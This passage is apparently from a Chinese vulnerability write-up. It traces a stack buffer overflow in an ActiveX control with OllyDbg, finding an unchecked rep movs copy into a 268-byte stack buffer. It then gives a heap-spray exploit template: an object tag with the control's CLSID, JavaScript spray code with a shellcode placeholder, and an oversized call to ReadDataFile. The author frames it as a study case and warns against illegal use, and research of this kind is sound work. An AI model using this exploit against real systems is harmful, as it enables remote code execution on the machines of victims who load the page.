此刻，我们注意到图 4 右下侧的堆栈区域显示“返回到 CHINAE~1.030D1AEC 来自
CHINAE~1.030EC120”，这意味着 CHINAE~1.030D1AEC这个地方是调用MessageBoxA函数的关

键地区，我们在OllyDbg程序中跳转到该地址。虽然，CHINAE~1.030D1AEC这个地方调用了
对话框函数，但是，这里已经发生了溢出，因为图4 的堆栈区下方已经被大量的“2C”所填
充。

为此，我们还需要回溯找到那个关键的函数。现在，在 OllyDbg中单步执行，直到我
们来到了 030D58B7这个内存地址。

这个函数才是最核心的函数，为什么这样讲，如果此刻我们从图6这个地址向上滚动
OllyDbg 的显示条，我们将会看到本次漏洞发生的真正原因。

上面这段代码中我们首先看到，函数利用指令“sub esp，10C”开辟了一段栈空间，
这个空间的大小只有268个字节，可是在随后的代码中，我们没有看到任何长度判断限制指
令，而是看到了类似“rep     movs dword ptr es:[edi], dword ptr [esi]”这样的内存
拷贝指令，于是，栈空间中保存的函数返回地址被过长的数据覆盖了，漏洞由此发生了。
至此，漏洞发生的原因我们明白了，剩下的就是漏洞的利用了，这个漏洞的利用方法
完全可以借助heapspray技术来实现，代码的基本结构如下。  
<object classid="clsid:5DFF65DA-6BBB-43D4-A6A6-1063D98DBB5E"
name="evil" ></object>
<script>
var heapSprayToAddress = 0x20202020;
 var shellcode = unescape("这里放入shellcode"); 
var heapBlockSize = 0x400000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u0505%uebdf%uebdf");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{  

   memory[i] = spraySlide + shellcode;
}
var a=Array(5000);
evil.ReadDataFile(a,1);
function getSpraySlide(spraySlide, spraySlideSize)
{
  while (spraySlide.length*2<spraySlideSize)
 {
   spraySlide += spraySlide;
 }
 spraySlide = spraySlide.substring(0,spraySlideSize/2);
 return spraySlide;
}
</script>

     最后，该漏洞属于非常典型的缓冲区溢出漏洞，可以作为一个学习 ActiveX 控件漏洞
挖掘分析的案例。由于漏洞属于首次公布，所以大家不要用本文的技术来做任何违法行为。